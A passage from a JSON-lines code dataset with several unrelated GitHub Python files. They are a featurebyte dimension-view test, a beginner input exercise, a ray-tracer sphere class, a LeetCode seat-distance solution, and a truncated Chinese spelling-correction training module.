snowflake_dimension_view_with_entity\n feature = view[\"col_float\"].as_feature(\"FloatFeature\")\n assert feature.name == \"FloatFeature\"\n assert feature.dtype == DBVarType.FLOAT\n\n feature_dict = feature.dict()\n graph_dict = feature_dict[\"graph\"]\n float_feature_node_dict = get_node(graph_dict, feature_dict[\"node_name\"])\n lookup_node_dict = get_node(graph_dict, \"lookup_1\")\n assert graph_dict[\"edges\"] == [\n {\"source\": \"input_1\", \"target\": \"graph_1\"},\n {\"source\": \"graph_1\", \"target\": \"lookup_1\"},\n {\"source\": \"lookup_1\", \"target\": \"project_1\"},\n ]\n assert float_feature_node_dict == {\n \"name\": \"project_1\",\n \"type\": \"project\",\n \"output_type\": \"series\",\n \"parameters\": {\"columns\": [\"FloatFeature\"]},\n }\n assert lookup_node_dict == {\n \"name\": \"lookup_1\",\n \"type\": \"lookup\",\n \"output_type\": \"frame\",\n \"parameters\": {\n \"input_column_names\": [\"col_float\"],\n \"feature_names\": [\"FloatFeature\"],\n \"entity_column\": \"col_int\",\n \"serving_name\": \"cust_id\",\n \"entity_id\": cust_id_entity.id,\n \"scd_parameters\": None,\n \"event_parameters\": None,\n },\n }\n\n\ndef test_multiple_as_feature__same_join(snowflake_dimension_view_with_entity):\n \"\"\"\n Test features created from different as_feature call is joined together in sql\n \"\"\"\n view = snowflake_dimension_view_with_entity\n feature_1 = view[\"col_float\"].as_feature(\"FloatFeature\")\n feature_2 = view[[\"col_float\", \"col_char\"]][\"col_char\"].as_feature(\"CharFeature\")\n feature_3_and_4 = view.as_features(\n [\"col_binary\", \"col_boolean\"], [\"BinaryFeature\", \"BoolFeature\"]\n )\n feature_list = FeatureList([feature_1, feature_2, feature_3_and_4], name=\"my_feature_list\")\n feature_list_sql = feature_list.sql\n assert (\n feature_list_sql\n == textwrap.dedent(\n \"\"\"\n WITH _FB_AGGREGATED AS (\n SELECT\n \"T0\".\"_fb_internal_lookup_col_float_project_1\" AS \"_fb_internal_lookup_col_float_project_1\",\n \"T0\".\"_fb_internal_lookup_col_char_project_1\" AS \"_fb_internal_lookup_col_char_project_1\",\n \"T0\".\"_fb_internal_lookup_col_binary_project_1\" AS \"_fb_internal_lookup_col_binary_project_1\",\n \"T0\".\"_fb_internal_lookup_col_boolean_project_1\" AS \"_fb_internal_lookup_col_boolean_project_1\"\n FROM REQUEST_TABLE AS REQ\n LEFT JOIN (\n SELECT\n \"col_int\" AS \"cust_id\",\n \"col_float\" AS \"_fb_internal_lookup_col_float_project_1\",\n \"col_char\" AS \"_fb_internal_lookup_col_char_project_1\",\n \"col_binary\" AS \"_fb_internal_lookup_col_binary_project_1\",\n \"col_boolean\" AS \"_fb_internal_lookup_col_boolean_project_1\"\n FROM (\n SELECT\n \"col_int\" AS \"col_int\",\n \"col_float\" AS \"col_float\",\n \"col_char\" AS \"col_char\",\n \"col_text\" AS \"col_text\",\n \"col_binary\" AS \"col_binary\",\n \"col_boolean\" AS \"col_boolean\",\n \"event_timestamp\" AS \"event_timestamp\",\n \"cust_id\" AS \"cust_id\"\n FROM \"sf_database\".\"sf_schema\".\"dimension_table\"\n )\n ) AS T0\n ON REQ.\"cust_id\" = T0.\"cust_id\"\n )\n SELECT\n \"_fb_internal_lookup_col_float_project_1\" AS \"FloatFeature\",\n \"_fb_internal_lookup_col_char_project_1\" AS \"CharFeature\",\n \"_fb_internal_lookup_col_binary_project_1\" AS \"BinaryFeature\",\n \"_fb_internal_lookup_col_boolean_project_1\" AS \"BoolFeature\"\n FROM _FB_AGGREGATED AS AGG\n \"\"\"\n ).strip()\n )\n\n\ndef test_sdk_code_generation(saved_dimension_table, update_fixtures):\n \"\"\"Check SDK code generation\"\"\"\n to_use_saved_data = True\n dimension_view = saved_dimension_table.get_view()\n check_sdk_code_generation(\n dimension_view,\n to_use_saved_data=to_use_saved_data,\n fixture_path=\"tests/fixtures/sdk_code/dimension_view.py\",\n update_fixtures=update_fixtures,\n table_id=saved_dimension_table.id,\n )\n","repo_name":"featurebyte/featurebyte","sub_path":"tests/unit/api/test_dimension_view.py","file_name":"test_dimension_view.py","file_ext":"py","file_size_in_byte":16326,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"78"} +{"seq_id":"40268473594","text":"\"\"\"\nCreate a program that asks the user to enter their name and their age. \nPrint out a message addressed to them that tells them the year that they \nwill turn 100 years old.\n\nExtras:\n\nAdd on to the previous program by asking the user for another number and \nprinting out that many copies of the previous message. \n(Hint: order of operations exists in Python)\nPrint out that many copies of the previous message on separate lines. \n(Hint: the string \"\\n is the same as pressing the ENTER button)\n\"\"\"\n\ndef main():\n name = input(\"Please input name: \")\n age = int(input(\"Please input age: \"))\n age_100 = 100-age\n times_repeat = int(input(\"How many times would you like this repeated? Input Number: \"))\n return name, age, age_100, times_repeat\n\n\nif __name__ == \"__main__\":\n name, age, age_100, times_repeat = main()\n print(f\"{name}, you are {age} years old and will turn 100 in {age_100} years!\\n\"*times_repeat)\n","repo_name":"Charlie-England/python_practice","sub_path":"exercise_1_char_input.py","file_name":"exercise_1_char_input.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12263289654","text":"import math\n\nimport rtPoint\nfrom rtPointFactory import rtPointFactory\nimport rtVector\nfrom matrixTransformationFactory import rtMatrixTransformationFactory\nfrom material import rtMaterial\n\nclass rtSphere(object):\n\n def __init__(self, pRadius=1.0, pOrigin=None, pID='1'):\n\n if pOrigin == None:\n tfac = rtPointFactory()\n self.sOrigin = tfac.newOriginPoint()\n else: \n self.sOrigin = pOrigin\n\n self.sRadius = pRadius\n self.sObjectID = pID\n\n self.sMaterial = rtMaterial()\n self.sMaterial.setDefaultValues()\n \n self.sTransform = rtMatrixTransformationFactory().newIdentity()\n self.sInverseTransform = self.sTransform.inverse()\n\n delta = 0.00001\n if abs(pRadius - 1.0) > delta:\n self.sTransform = rtMatrixTransformationFactory().newScaling( pRadius, pRadius, pRadius )\n self.sInverseTransform = self.sTransform.inverse()\n \n\n def origin(self):\n return self.sOrigin\n \n def radius(self):\n return self.sRadius\n\n def transform(self):\n return self.sTransform\n\n def inverseTransform(self):\n return self.sInverseTransform\n\n def applyTransform(self, pTransform):\n\n self.sTransform = self.sTransform.transform (pTransform)\n self.sInverseTransform = self.sTransform.inverse()\n \n def setMaterial (self, pMaterial):\n self.sMaterial = pMaterial\n \n def getMaterial (self):\n return self.sMaterial\n \n def asText(self):\n return 'Sphere %s' % str(self.sObjectID)\n \n def normalAtObjectPoint(self, objectX, objectY, objectZ):\n\n # return a vector from my centre to the point objectX, objectY, objectZ\n originData = self.sOrigin.getMatrixData()\n\n return rtVector.rtVector(objectX - originData[0][0], objectY - originData[0][1], objectZ - originData[0][2])\n\n def normalAtWorldPoint(self, worldX, worldY, worldZ):\n\n # return a vector from my centre to the world point worldX, worldY, worldZ\n\n # object point is the point transformed to object space\n # objectPoint = inverse(self.transform) * world point\n\n worldPoint = rtPoint.rtPoint(worldX, worldY, worldZ)\n\n objectPointMatrix = self.transform().inverse().multiplyWithAnother(worldPoint.matrix.transpose()).transpose()\n objectPoint = rtPoint.rtPoint()\n objectPoint.matrix = objectPointMatrix\n\n objectNormal = objectPoint.subtractAnotherFromMe(rtPoint.rtPoint())\n\n worldNormalMatrix = self.transform().inverse().transpose().multiplyWithAnother(objectNormal.matrix.transpose()).transpose()\n\n worldNormal = rtVector.rtVector()\n worldNormal.matrix = worldNormalMatrix\n\n return worldNormal\n\n\n \n def showMe(self, label=''):\n\n if len(label) > 0:\n print ('**** %s ****' % label)\n print ('origin')\n self.sOrigin.showMe()\n print ('radius %s' % str(self.sRadius))\n self.sTransform.showMe('Transform')\n self.sMaterial.showMe('Material')\n \n\n def asDictionary(self):\n\n res = {'Sphere': {}}\n res['Sphere']['origin'] = self.origin().asDictionary()\n res['Sphere']['radius'] = self.radius()\n res['Sphere']['id'] = self.sObjectID\n return res\n\n \n","repo_name":"glennnichollsubisense/rayTracing","sub_path":"rtSphere.py","file_name":"rtSphere.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38901679151","text":"# -*- coding: utf-8 -*-\n# ======================================\n# @File : 849.py\n# @Time : 2020/4/23 23:19\n# @Author : Rivarrl\n# ======================================\nfrom algorithm_utils import *\n\nclass Solution:\n @timeit\n def maxDistToClosest(self, seats: List[int]) -> int:\n n = len(seats)\n a = [0] * n\n last = 0 if a[0] == 1 else -1\n for i in range(n):\n if seats[i] == 1:\n last = i\n a[i] = n\n else:\n a[i] = n if last == -1 else i - last\n last = n-1 if a[-1] == 1 else -1\n for i in range(n-1, -1, -1):\n if last == -1:\n pass\n else:\n a[i] = min(a[i], last - i)\n if seats[i] == 1:\n last = i\n a[i] = n\n for i in range(n):\n if a[i] == n:\n a[i] = -1\n return max(a)\n\nif __name__ == '__main__':\n a = Solution()\n a.maxDistToClosest([1,0,0,0,1,0,1])\n a.maxDistToClosest([1,0,0,0])\n a.maxDistToClosest([0,0,1])","repo_name":"Rivarrl/leetcode_python","sub_path":"leetcode/601-900/849.py","file_name":"849.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"16666090657","text":"\"\"\"\n@Time : 2021-01-21 10:57:33\n@File : csc_trainer.py\n@Author : okcd00, Abtion\n@Email : okcd00@qq.com\n\"\"\"\n\nimport os\nimport gc \nimport time\nimport psutil\nimport numpy as np\nfrom copy import deepcopy\nfrom pprint import pprint\nfrom mem_top import mem_top\nfrom collections import defaultdict\n\nimport torch\nfrom transformers import BertTokenizer\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom urllib.parse import quote\nfrom bbcm.utils import flatten\nfrom bbcm.utils.text_utils import (split_2_short_text, convert_to_unicode, is_chinese_char)\nfrom bbcm.data.loaders.collator import DataCollatorForCsc\nfrom bbcm.utils.evaluations import (compute_detector_prf, \n compute_corrector_prf,\n compute_sentence_level_prf, \n report_prf)\nfrom bbcm.engine.bases import BaseTrainingEngine\n\n\ndef show_memory_allocates():\n results = mem_top(\n limit=15, width=128, sep='\\n',\n refs_format='{num}\\t{type} {obj}', \n bytes_format='{num}\\t {obj}', \n types_format='{num}\\t {obj}',\n verbose_types=None, \n verbose_file_name='/tmp/mem_top')\n print(results)\n\n\nclass CscTrainingModel(BaseTrainingEngine):\n \"\"\"\n 用于CSC的BaseModel, 定义了训练及预测步骤\n \"\"\"\n stanford_model_path = r'/home/chendian/download/stanford-corenlp-4.2.2/'\n\n def __init__(self, cfg, *args, **kwargs):\n super().__init__(cfg, *args, **kwargs)\n self.cfg = cfg\n self.timer = []\n self.debug = False\n self.memory_leak_test = True\n\n # model\n self.w = float(cfg.MODEL.HYPER_PARAMS[0]) # loss weight for cor & det\n self.output_type = 'logits'\n self.tokenizer = BertTokenizer.from_pretrained(cfg.MODEL.BERT_CKPT)\n # self.tokenizer._add_tokens(['“', '”'])\n\n # for inference\n self.entity_recognizer = None\n self.vocab_pinyin = None\n self.collator = None\n\n # threshold for prediction judgment\n self.judge_line = 0.5\n self.has_explict_detector = True\n self.show_result_steps = int(1e4) # 10k steps per hour\n\n # record lists\n self.train_loss_epoch = []\n self.train_loss_window = []\n \n # (mean, count) case\n self.train_det_f1_case = []\n self.train_cor_f1_case = [] \n\n # record matrix\n self.count_matrix_epoch = None\n self.count_matrix = None\n self.reset_matrix_epoch()\n self.reset_matrix() \n\n # logging\n self.board_writer = None\n self.recorder = defaultdict(int)\n self.tb_writer = SummaryWriter(cfg.OUTPUT_DIR + '/tensorboard_logs/')\n\n # process info\n self.process = psutil.Process(os.getpid())\n\n @staticmethod\n def pt2list(_tensor):\n ret = _tensor.cpu().numpy().tolist()\n return ret\n\n def init_collator(self): \n return DataCollatorForCsc(\n cfg=self.cfg, tokenizer=self.tokenizer, need_pinyin=True)\n\n def load_vocab_pinyin(self):\n return [line.strip() for line in open(\n os.path.join(self.cfg.MODEL.DATA_PATH, 'vocab_pinyin.txt'))]\n\n def update_mean_value(self, case, val, cnt=1):\n if len(case) != 2:\n val_mean, val_count = 0., 0.\n else: \n val_mean, val_count = case[0], case[1]\n val_mean = (val_mean * val_count + val * cnt) / (val_count + cnt)\n val_count += cnt\n return [val_mean, val_count]\n\n def record_time(self, information):\n \"\"\"\n @param information: information that describes the time point.\n \"\"\"\n self.timer.append((information, time.time()))\n\n def show_timer_trainer(self, to_print=True):\n if not self.timer:\n return []\n phase, start_t = self.timer[0]\n logs = []\n time_str = time.strftime(\"%H:%M:%S\", time.gmtime(start_t))\n logs.append(f\"{phase}\\t{time_str}\")\n for phase, t in self.timer[1:]:\n logs.append(f\"{phase}\\t{t - start_t}\")\n if to_print:\n for line in logs:\n self.print(line)\n return logs \n\n def init_entity_recognizer(self):\n from stanfordcorenlp import StanfordCoreNLP\n stanford_model_path = self.stanford_model_path\n\n self.print(f\"Now loading NER model from {stanford_model_path}\")\n stanford_model = StanfordCoreNLP(stanford_model_path, lang='zh', quiet=True)\n self.entity_recognizer = stanford_model\n # usage: word_tags = stanford_model.ner(quote(str))\n\n def logging_all(self, item, name, record_tb=False):\n if self.trainer.is_global_zero:\n self._logger.info(f'{name}: {item}')\n self.log(f'{name}', item)\n if record_tb:\n self.tb_writer.add_scalar(f'{name}', item, self.recorder[f'{name}'])\n # auto indexing\n self.recorder[f'{name}'] += 1\n\n def update_matrix(self, details):\n count_matrix = {}\n for key in ['det_char', 'cor_char', 'det_sent', 'cor_sent']:\n if key + '_counts' in details:\n tp, fp, fn = deepcopy(self.count_matrix[f\"{key}_counts\"])\n _tp, _fp, _fn = deepcopy(details[f\"{key}_counts\"])\n count_matrix[f\"{key}_counts\"] = [tp+_tp, fp+_fp, fn+_fn]\n self.count_matrix = count_matrix\n\n def reset_matrix(self):\n count_matrix = {}\n flag = False\n if self.count_matrix is None:\n flag = True\n for key in ['det_char', 'cor_char', 'det_sent', 'cor_sent']:\n if not flag:\n tp, fp, fn = deepcopy(self.count_matrix_epoch[f\"{key}_counts\"])\n _tp, _fp, _fn = deepcopy(self.count_matrix[f\"{key}_counts\"])\n self.count_matrix_epoch[f\"{key}_counts\"] = [tp+_tp, fp+_fp, fn+_fn]\n count_matrix[f\"{key}_counts\"] = [0, 0, 0] # [TP, FP, FN]\n self.count_matrix = deepcopy(count_matrix)\n del count_matrix\n\n def reset_matrix_epoch(self):\n count_matrix_epoch = {}\n for key in ['det_char', 'cor_char', 'det_sent', 'cor_sent']:\n count_matrix_epoch[f\"{key}_counts\"] = [0, 0, 0] # [TP, FP, FN]\n self.count_matrix_epoch = count_matrix_epoch\n\n def print_prf_for_fusion_matrix(self, n_step, output_key=None, count_matrix=None):\n # output_key is a list or a string\n results = {} \n if output_key is None:\n output_key = ['cor_sent']\n if count_matrix is None:\n count_matrix = self.count_matrix\n for key in count_matrix:\n if self.w == 0. and 'cor_' in key:\n continue\n phase = f\"{key.replace('_counts', '')} at {n_step}-th steps\"\n if n_step == 0:\n phase = f\"{key.replace('_counts', '')} at epoch end.\"\n tp, fp, fn = deepcopy(count_matrix[key])\n _logger = self._logger if self.trainer.is_global_zero else None\n precision, recall, f1_score = report_prf(\n tp, fp, fn, logger=_logger, phase=phase)\n if key.replace('_counts', '') in output_key:\n results[key.replace('_counts', '')] = (precision, recall, f1_score)\n return results\n\n def get_encoded_texts(self, texts):\n if texts is None:\n return None\n encoded_texts = self.tokenizer(texts, padding=True, return_tensors='pt')\n encoded_texts_cuda = encoded_texts.to(self._device)\n del encoded_texts # try to explictly delete, instead of overwrite on same var_name.\n return encoded_texts_cuda \n\n def get_results_from_outputs(self, outputs, batch, output_type=None):\n if output_type is None:\n output_type = self.output_type \n # batch: 原句,纠正句,错误位置\n ori_text, cor_text, det_y = batch[:3]\n # outputs: 检错loss,纠错loss,检错输出(logits),纠错输出(logits)\n # outputs: 检错输出(prob),纠错输出(prob),拼音输出(prob)\n det_output, cor_output = outputs[2], outputs[3]\n\n if det_output is None:\n det_prob = None\n elif output_type.startswith('logit'):\n det_prob = torch.sigmoid(det_output).squeeze(-1)\n elif output_type.startswith('prob'): # 'prob':\n det_prob = det_output.squeeze(-1)\n else:\n raise ValueError(\"Invalid output type:\", str(output_type))\n \n # (batch_size, sequence_length)\n # the judge_line is allowed not to be 0.5.\n if det_output is not None:\n det_pred = det_prob > self.judge_line\n det_y_hat = det_pred.to(self._device).long()\n\n # (batch_size, sequence_length)\n if cor_output is not None:\n encoded_y = self.get_encoded_texts(cor_text)\n cor_y_hat = torch.argmax(cor_output, dim=-1)\n cor_y_hat *= encoded_y['attention_mask']\n cor_y = encoded_y['input_ids']\n\n results = []\n for _idx, src in enumerate(ori_text):\n # [CLS] [1: len(text)+1] [SEP] [PAD]s\n _src = list(self.tokenizer(src, add_special_tokens=False)['input_ids'])\n if self.memory_leak_test:\n __src = deepcopy(_src)\n del _src\n _src = __src\n\n # whether a token from correction is the same as the truth token.\n if cor_output is None:\n c_tgt = c_predict = [0] * len(_src)\n else:\n # tgt, predict = cor_y[_idx], cor_y_hat[_idx]\n c_tgt = self.pt2list(cor_y[_idx][1: len(_src) + 1])\n c_predict = self.pt2list(cor_y_hat[_idx][1: len(_src) + 1])\n\n # whether a token from detection is the same as the truth token.\n if det_output is None:\n d_tgt = d_predict = [0] * len(_src)\n else:\n # det_label, det_predict = det_y[_idx], det_y_hat[_idx]\n d_tgt = self.pt2list(det_y[_idx][1: len(_src) + 1])\n d_predict = self.pt2list(det_y_hat[_idx][1: len(_src) + 1])\n\n # a tuple of lists, all token_ids\n results.append((_src, c_tgt, c_predict, d_tgt, d_predict))\n\n # results for calculating PRF\n return results\n\n def show_train_windows(self, n_step=0, is_epoch_end=False):\n results = self.print_prf_for_fusion_matrix(\n n_step=n_step, \n output_key=['det_sent', 'cor_sent'],\n ) # det_sent/cor_sent\n _, _, _det_f = results.get('det_sent', (0., 0., 0.))\n _, _, _cor_f = results.get('cor_sent', (0., 0., 0.))\n avg_trn_loss = self.train_loss_window[0] if self.train_loss_window else 0.\n \n # logger info\n self.logging_all(avg_trn_loss, name='average_train_loss')\n self.logging_all(_det_f, name='average_train_det_f1')\n self.logging_all(_cor_f, name='average_train_cor_f1')\n self.train_loss_window = []\n self.reset_matrix() # reset for next round\n\n if is_epoch_end:\n print(\"[{}] The validation on {}th epoch's starts.\".format(\n self._device, self.current_epoch))\n # micro\n _det_f1 = self.train_det_f1_case[0] if self.train_det_f1_case else 0.\n _cor_f1 = self.train_cor_f1_case[0] if self.train_cor_f1_case else 0.\n self.logging_all(_det_f1, name='train_det_f1_epoch', record_tb=True)\n self.logging_all(_cor_f1, name='train_cor_f1_epoch', record_tb=True)\n self.train_det_f1_case = []\n self.train_cor_f1_case = []\n # macro\n results = self.print_prf_for_fusion_matrix(\n n_step=n_step, \n output_key=['det_sent', 'cor_sent'],\n count_matrix=self.count_matrix_epoch,\n ) # det_sent/cor_sent\n _, _, _det_f1 = results.get('det_sent', (0., 0., 0.))\n _, _, _cor_f1 = results.get('cor_sent', (0., 0., 0.))\n self.logging_all(_det_f1, name='train_det_macro_f1_epoch', record_tb=True)\n self.logging_all(_cor_f1, name='train_cor_macro_f1_epoch', record_tb=True)\n self.reset_matrix_epoch()\n else: # reduce space complexity\n self.train_det_f1_case = self.update_mean_value(\n case=self.train_det_f1_case, val=_det_f)\n self.train_cor_f1_case = self.update_mean_value(\n case=self.train_cor_f1_case, val=_cor_f)\n del results\n \n if self.trainer.is_global_zero:\n show_memory_allocates() # covers gc.collect()\n else:\n gc.collect()\n self.print(f\"Step {n_step}: memory {self.process.memory_info().rss // 1000000} MB\")\n\n # @profile\n def training_step(self, batch, batch_idx):\n # ori_text, cor_text, det_labels = batch\n # outputs: 检错loss,纠错loss,检错logits,纠错logits\n if not batch:\n return 0.\n if self.debug:\n self.record_time(f'batch {batch_idx}')\n \n outputs = self.forward(*batch)\n det_loss, cor_loss = outputs[0], outputs[1]\n d_loss = det_loss.item() if torch.is_tensor(det_loss) else det_loss\n c_loss = cor_loss.item() if torch.is_tensor(cor_loss) else cor_loss\n if False and d_loss < c_loss and self.w < 0.5:\n # 先学好 det_loss,再注重学 cor_loss,所以 w 一般设置 < 0.5\n loss = (1 - self.w) * cor_loss + self.w * det_loss \n else: # learn more for detection as default\n loss = self.w * cor_loss + (1. - self.w) * det_loss\n \n if self.show_result_steps > 0:\n # record results\n results = self.get_results_from_outputs(\n outputs, batch, output_type='logits')\n details = compute_corrector_prf(results, logger=None) \n if self.has_explict_detector:\n details_det = compute_detector_prf(results, logger=None)\n for _key, _value in details_det.items():\n details[_key] = _value\n self.update_matrix(details)\n del details_det, details\n \n _loss = loss.item()\n self.train_loss_window = self.update_mean_value(\n case=self.train_loss_window, val=_loss)\n # curr_epoch = self.current_epoch\n # curr_step = self.global_step\n self.tb_writer.add_scalar('train_loss', _loss, self.global_step)\n if self.w < 1. and False: # reduce writer CPU memory capacity\n self.tb_writer.add_scalar('train_det_loss', d_loss, self.global_step)\n if self.w > 0. and False: # reduce writer CPU memory capacity\n self.tb_writer.add_scalar('train_cor_loss', c_loss, self.global_step)\n\n # show results for every k steps\n if batch_idx > 0 and self.show_result_steps != -1:\n # self.log('global_step', self.global_step)\n if batch_idx % self.show_result_steps == 0:\n _val, _cnt = self.train_loss_window\n self.train_loss_epoch = self.update_mean_value(\n case=self.train_loss_epoch,\n val=_val, cnt=_cnt)\n # the train_loss_window will be cleaned after show func\n self.show_train_windows(n_step=batch_idx)\n if self.memory_leak_test:\n gc.collect()\n return loss\n\n def validation_step(self, batch, batch_idx):\n # ori_text, cor_text, det_labels = batch[:3]\n # outputs: 检错loss,纠错loss,检错输出,纠错输出\n with torch.no_grad():\n outputs = self.forward(*batch)\n det_loss, cor_loss = outputs[:2]\n d_loss = det_loss.item() if torch.is_tensor(det_loss) else det_loss\n c_loss = cor_loss.item() if torch.is_tensor(cor_loss) else cor_loss\n if False and d_loss < c_loss and self.w < 0.5:\n loss = (1 - self.w) * c_loss + self.w * d_loss \n else: # learn more for detection as default\n loss = self.w * c_loss + (1 - self.w) * d_loss\n\n results = self.get_results_from_outputs(\n outputs, batch, output_type='logits')\n return loss, d_loss, c_loss, results\n\n def validation_epoch_end(self, outputs, log_detail_dict=False, is_testing=False):\n results = []\n\n logs = self.show_timer_trainer(to_print=False)\n if logs:\n with open(\"./logs_220811.txt\", 'a') as f:\n for line in logs:\n f.write(f\"{line}\\n\")\n logs = []\n\n # loss, d_loss, c_loss, results\n for out in outputs:\n # a list of (_src, c_tgt, c_predict, d_tgt, d_predict)\n results += out[-1]\n loss = np.mean([out[0] for out in outputs])\n det_loss = np.mean([out[1] for out in outputs])\n cor_loss = np.mean([out[2] for out in outputs])\n if self.memory_leak_test:\n del outputs\n \n # record and refresh train loss case (the last-k-steps)\n if not is_testing:\n # testing phase has no logs from training\n if len(self.train_loss_window) > 0:\n _val, _cnt = self.train_loss_window\n self.train_loss_epoch = self.update_mean_value(\n case=self.train_loss_epoch, \n val=_val, cnt=_cnt)\n self.train_loss_window = []\n self.show_train_windows( # epoch ends\n n_step=0, is_epoch_end=True)\n if len(self.train_loss_epoch) > 0:\n train_loss_epoch = self.train_loss_epoch[0]\n self.logging_all(train_loss_epoch, name='train_loss_epoch')\n\n # measure functions\n details = compute_corrector_prf(results, logger=self._logger)\n if self.has_explict_detector:\n details_det = compute_detector_prf(results, logger=None)\n for _key, _value in details_det.items():\n details[_key] = _value\n if self.memory_leak_test:\n del details_det\n # pprint({k: v for k, v in details_det.items() if 'det' in k})\n if self.memory_leak_test:\n del results\n pprint({k: v for k, v in details.items()})\n # take sent-level as the targeted measure.\n det_f1, cor_f1 = details['det_sent_f1'], details['cor_sent_f1']\n det_acc, cor_acc = details['det_sent_acc'], details['cor_sent_acc']\n\n # logger info\n if not is_testing:\n # testing phase has no rest logs from training\n self.logging_all(self.current_epoch, 'epoch')\n self.logging_all(loss, 'valid_loss')\n if self.w < 1.:\n self.logging_all(det_loss, 'valid_det_loss')\n if self.w > 0.:\n self.logging_all(cor_loss, 'valid_cor_loss')\n\n # detailed log_dict of performance\n if log_detail_dict:\n log_dict = {k: v for k, v in details.items() if not k.endswith('_counts')}\n counts_offset = ['TP', 'FP', 'FN']\n for key in details:\n if key.endswith('_counts'):\n for i, num in enumerate(details[key]):\n log_dict[f\"{key}_{counts_offset[i]}\"] = num\n # details[key] = np.array(details[key], dtype=int)\n self.log_dict(deepcopy(log_dict), logger=True)\n if self.memory_leak_test:\n del log_dict\n if self.memory_leak_test:\n del details # values still remains\n\n print(\"[{}] The validation on {}th epoch's ends.\".format(\n self._device, self.current_epoch))\n print(f\"Detection Acc: {det_acc}, Detection F1: {det_f1}\")\n print(f\"Correction Acc: {cor_acc}, Correction F1: {cor_f1}\")\n return det_acc, cor_acc, det_f1, cor_f1\n\n def test_step(self, batch, batch_idx):\n # ori_text, cor_text, det_labels = batch[:3]\n # outputs: 检错loss,纠错loss,检错输出,纠错输出\n with torch.no_grad():\n outputs = self.forward(*batch)\n \n results = self.get_results_from_outputs(\n outputs, batch, output_type='prob')\n return 0., 0., 0., results\n\n def test_epoch_end(self, outputs):\n det_acc, cor_acc, det_f1, cor_f1 = self.validation_epoch_end(\n outputs, log_detail_dict=True, is_testing=True)\n print(\"[{}] The Test on {}th epoch's ends.\".format(\n self._device, self.current_epoch))\n print(f\"Detection Acc: {det_acc}, Detection F1: {det_f1}\")\n print(f\"Correction Acc: {cor_acc}, Correction F1: {cor_f1}\")\n self.tb_writer.close()\n return det_acc, cor_acc, det_f1, cor_f1\n \n def generate_pinyin_inputs_for_predict(self, texts):\n encoded_err = self.get_encoded_texts(texts)\n if self.collator is None:\n self.collator = self.init_collator()\n pinyin_lists = self.collator.generate_pinyin_labels(\n token_ids=encoded_err['input_ids'], texts=texts,\n similar_pinyins=False, in_batch=True)\n pinyin_inputs = torch.from_numpy(\n np.stack(pinyin_lists)).squeeze(-1)\n return pinyin_inputs\n\n def generate_ignore_mask_for_predict(self, texts):\n # the mask consists of 0(normal) and 1(ignore)\n if isinstance(texts, list):\n mask_case = [self.generate_ignore_mask_for_predict(text) for text in texts]\n max_len = max(map(len, mask_case))\n mask_case = [1 - np.pad(msk, (0, (max_len-len(msk)))) for msk in mask_case]\n return torch.from_numpy(np.stack(mask_case))\n\n def judge_valid_token_for_csc(token):\n if token.startswith('##'):\n token = token[2:]\n if len(token) > 1:\n return 0 # invalid\n if is_chinese_char(ord(token)):\n return 1 # valid\n return 0 # invalid\n\n def mark_entities(ignore_case, tok_case, _text):\n pivot = 1\n char_to_word_idx = []\n for tok_idx, tok in enumerate(tok_case):\n if tok.startswith('##'):\n tok = tok[2:]\n for c in tok:\n char_to_word_idx.append(tok_idx)\n char_to_word_idx.append(len(tok_case)) # end\n rest_str = f\"{_text}\"\n if self.entity_recognizer is None:\n self.init_entity_recognizer()\n _entities = self.entity_recognizer.ner(quote(texts))\n # print(char_to_word_idx)\n for word, tag in _entities:\n if tag in ['O', 'TITLE']:\n continue\n # print(word, tag)\n offset = rest_str.index(word) + len(word) \n # print(offset)\n pivot += offset\n # print(pivot, pivot-len(word), pivot)\n ignore_case[char_to_word_idx[pivot-len(word)]: char_to_word_idx[pivot-1]+1] = 0\n # print(pivot+1, pivot+1+len(word), ignore_case)\n rest_str = rest_str[offset:]\n # print(rest_str)\n return ignore_case \n\n tok_case = self.tokenizer.tokenize(convert_to_unicode(texts))\n # [CLS] ... [SEP]\n ignore_case = np.array([0] + [judge_valid_token_for_csc(tok) for tok in tok_case] + [0]) \n ignore_case = mark_entities(ignore_case, tok_case, texts)\n return ignore_case\n\n def convert_ids_to_pinyins(self, ids):\n if self.vocab_pinyin is None:\n self.vocab_pinyin = self.load_vocab_pinyin()\n return [self.vocab_pinyin[_id] for _id in ids]\n\n def predict(self, texts, detail=False, \n predict_shorter=False, unk_sign='֍', det_labels=None, det_mask=None):\n from bbcm.utils.text_utils import clean_text\n if not isinstance(texts, list): \n # single string without a list container\n texts = [texts]\n texts = [clean_text(text).lower() for text in texts]\n \n if predict_shorter: # split long strings into substrings\n texts = [split_2_short_text(text) for text in texts]\n texts = [_sentence for _sentence, _idx in texts]\n parts_rec = [len(text_case) for text_case in texts]\n texts = flatten(texts)\n \n inputs = self.tokenizer(\n texts, padding=True, return_tensors='pt')\n inputs.to(self.cfg.MODEL.DEVICE)\n \n with torch.no_grad():\n pinyin_inputs = None\n if 'pinyin' in self.cfg.MODEL.ENCODER_TYPE:\n pinyin_inputs = self.generate_pinyin_inputs_for_predict(texts)\n if 'gold' not in self.cfg.MODEL.MERGE_MASK_TYPE:\n # during training, det_mask is given for gold mask\n # during inference, det_mask is None for soft mask\n det_labels = None\n \n # if det_mask is None:\n # det_mask = self.generate_ignore_mask_for_predict(texts)\n\n # outputs: 检错loss,纠错loss,检错logits,纠错logits\n outputs = self.forward(\n texts=texts, \n cor_labels=None, # testset has no cor_labels\n det_labels=det_labels,\n pinyin_inputs=pinyin_inputs, \n confusion_mask=None, # generated by the model\n det_mask=det_mask, # generate by the trainer\n )\n \n # 检测 prob,纠错 prob [, pinyin output]\n # (batch_size, sequence_length)\n # (batch_size, sequence_length, vocab_size)\n # 检错loss,纠错loss,检错输出,纠错输出\n det_prob, cor_prob, pinyin_prob = outputs[2:5]\n if self.cfg.MODEL.PREDICT_PINYINS:\n # (batch_size, sequence_length, pinyin_vocab_size)\n y_pinyins = torch.argmax(pinyin_prob, dim=-1).cpu().numpy()\n expand_text_lens = torch.sum(\n inputs['attention_mask'], dim=-1) - 1\n \n prob_detection = []\n prob_correction = 